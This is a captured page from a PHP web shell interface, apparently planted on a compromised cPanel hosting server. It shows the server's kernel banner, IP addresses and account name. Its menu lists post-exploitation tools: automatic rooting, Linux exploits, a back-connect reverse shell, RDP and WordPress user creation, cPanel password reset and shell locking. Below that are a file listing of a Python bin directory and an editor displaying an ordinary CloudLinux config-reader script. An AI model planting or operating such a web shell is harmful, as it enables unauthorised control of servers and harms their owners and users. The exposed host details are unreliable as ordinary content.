Linux cpanel07wh.bkk1.cloud.z.com 2.6.32-954.3.5.lve1.4.80.el6.x86_64 #1 SMP Thu Sep 24 01:42:00 EDT 2020 x86_64
Apache
: 163.44.198.52 | : 216.73.216.52
Cant Read [ /etc/named.conf ]
8.0.9
cp657342
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
opt /
alt /
python37 /
bin /
[ HOME SHELL ]
Name
Size
Permission
Action
alembic
971
B
-rwxr-xr-x
chardetect
401
B
-rwxr-xr-x
cl_sysctl
4.62
KB
-rwxr-xr-x
clcpapi
3.75
KB
-rwxr-xr-x
cpanel-dbmapping
3.83
KB
-rwxr-xr-x
da_suid_caller.py
548
B
-rw-r--r--
futurize
973
B
-rwxr-xr-x
jsonschema
410
B
-rwxr-xr-x
lswsgi
99.44
KB
-rwxr-xr-x
lvestats_config_reader.py
1.19
KB
-rw-r--r--
mako-render
970
B
-rwxr-xr-x
normalizer
1013
B
-rwxr-xr-x
nosetests-3.7
398
B
-rwxr-xr-x
pasteurize
977
B
-rwxr-xr-x
pip
661
B
-rwxr-xr-x
pip-3
661
B
-rwxr-xr-x
pip-3.7
661
B
-rwxr-xr-x
pip3
661
B
-rwxr-xr-x
pip3.7
661
B
-rwxr-xr-x
pydoc3
91
B
-rwxr-xr-x
pydoc3.7
91
B
-rwxr-xr-x
pyjwt
385
B
-rwxr-xr-x
python3
6
KB
-rwxr-xr-x
python3-config
173
B
-rwxr-xr-x
python3.7
6
KB
-rwxr-xr-x
python3.7-config
173
B
-rwxr-xr-x
python3.7m
6
KB
-rwxr-xr-x
python3.7m-config
173
B
-rwxr-xr-x
python3.7m-x86_64-config
3.16
KB
-rwxr-xr-x
pyvenv
448
B
-rwxr-xr-x
pyvenv-3.7
448
B
-rwxr-xr-x
raven
961
B
-rwxr-xr-x
virtualenv
992
B
-rwxr-xr-x
virtualenv-3
992
B
-rwxr-xr-x
virtualenv-37
992
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : lvestats_config_reader.py
# coding: utf-8 # Copyright © Cloud Linux GmbH & Cloud Linux Software, Inc 2010-2021 All Rights Reserved # # Licensed under CLOUD LINUX LICENSE AGREEMENT # http://cloudlinux.com/docs/LICENSE.TXT from __future__ import print_function from __future__ import absolute_import import argparse import sys import json from lvestats.plugins.generic.statsnotifier import get_stats_notifier_parameters from clcommon.utils import is_user_present SUPPORTED_PARAMS = ['notification_allowed'] if __name__ == '__main__': parser = argparse.ArgumentParser(description='Tool for getting parameters from config') parser.add_argument('-u', '--user', required=True, help='Specify username') parser.add_argument('parameter', help='Parameter to read', choices=SUPPORTED_PARAMS) args = parser.parse_args() target_user = args.user if not is_user_present(target_user): print(json.dumps({'error': f'No such user {target_user}'})) sys.exit(-1) try: result = get_stats_notifier_parameters(target_user) print(json.dumps({args.parameter: result})) sys.exit(0) except Exception as e: print(json.dumps({'error': str(e)})) sys.exit(-1)
Close